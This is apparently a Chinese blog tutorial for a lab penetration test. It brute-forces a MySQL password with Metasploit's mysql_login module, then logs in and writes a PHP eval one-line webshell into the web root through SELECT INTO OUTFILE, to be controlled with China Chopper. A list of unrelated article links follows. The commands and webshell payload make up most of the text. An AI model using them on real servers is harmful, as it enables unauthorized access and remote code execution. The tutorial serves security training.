linux渗透测试Metasploit模块(暴力破解数据库密码)
2023-04-18 14:46:47 时间
前言
学习内容:通过Metasploit暴力破解数据库密码,并在数据库中写入一句话木马。
渗透机:172.16.5.196 含有字典2.txt
靶机:172.16.5.192 安装了mysql vsftpd服务
要保证渗透机与靶机要ping的通
1.输入msfconsole启动Metasploit,使用/auxiliary/scanner/mysql/mysql_login
use /auxiliary/scanner/mysql/mysql_login
2.设置目标IP地址,用户名与字典路径,这里我将字典2.txt放在了/root路径下,实际操作要根据自身的路径来设置,当然如果你没有字典肯定是做不了的
设置好后输入run运行模块
最后等待它跑完字典后数据库的用户名密码就出来了
3.远程登录靶机的数据库
mysql -h 172.16.5.192 -u root -paababb
use mysql; 使用mysql数据库
select '<?php @eval ($_POST["123456"])?>' into outfile '/var/www/html/shell.php'; 写入一句话木马
成功后就可以上菜刀了,右键添加shell,最后双击添加的shell就可以连接上写入的木马了
相关文章
- 【技术种草】cdn+轻量服务器+hugo=让博客“云原生”一下
- CLB运维&运营最佳实践 ---访问日志大洞察
- vnc方式登陆服务器
- 轻松学排序算法:眼睛直观感受几种常用排序算法
- 十二个经典的大数据项目
- 为什么使用 CDN 内容分发网络?
- 大数据——大数据默认端口号列表
- Weld 1.1.5.Final,JSR-299 的框架
- JavaFX 2012:彻底开源
- 提升as3程序性能的十大要点
- 通过凸面几何学进行独立于边际的在线多类学习
- 利用行动影响的规律性和部分已知的模型进行离线强化学习
- ModelLight:基于模型的交通信号控制的元强化学习
- 浅谈Visual Source Safe项目分支
- 基于先验知识的递归卡尔曼滤波的代理人联合状态和输入估计
- 结合网络结构和非线性恢复来提高声誉评估的性能
- 最佳实践丨云开发CloudBase多环境管理实践
- TimeVAE:用于生成多变量时间序列的变异自动编码器
- 具有线性阈值激活的神经网络:结构和算法
- 内网渗透之横向移动 -- 从域外向域内进行密码喷洒攻击